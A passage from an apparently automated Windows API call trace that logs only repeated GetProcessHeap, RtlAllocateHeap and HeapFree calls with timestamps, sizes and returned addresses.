returned 0xe30000 [0069.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xe9d540 [0069.736] GetProcessHeap () returned 0xe30000 [0069.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0xe9e698 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xea0078 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xea0300 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xea0078 | out: hHeap=0xe30000) returned 1 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xea0590 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0xea0820 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0xe9dc78 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xea0cb0 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xea1140 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xea0078 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0xea15d0 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9d7c8 [0069.737] GetProcessHeap () returned 0xe30000 [0069.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xea1a68 [0069.737] GetProcessHeap () returned 0xe30000 [0069.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xea0078 | out: hHeap=0xe30000) returned 1 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xea1cf8 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xea1a68 | out: hHeap=0xe30000) returned 1 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9fbe0 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0xea1a68 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9fbe0 | out: hHeap=0xe30000) returned 1 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xea2188 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xea1a68 | out: hHeap=0xe30000) returned 1 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0069.738] GetProcessHeap () returned 0xe30000 [0069.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0069.739] GetProcessHeap () returned 0xe30000 [0069.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0069.739] GetProcessHeap () returned 0xe30000 [0069.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0069.740] GetProcessHeap () returned 0xe30000 [0069.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0069.740] GetProcessHeap () returned 0xe30000 [0069.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0069.741] GetProcessHeap () returned 0xe30000 [0069.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0069.742] GetProcessHeap () returned 0xe30000 [0069.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0069.743] GetProcessHeap () returned 0xe30000 [0069.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.744] GetProcessHeap () returned 0xe30000 [0069.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.745] GetProcessHeap () returned 0xe30000 [0069.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0069.745] GetProcessHeap () returned 0xe30000 [0069.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.746] GetProcessHeap () returned 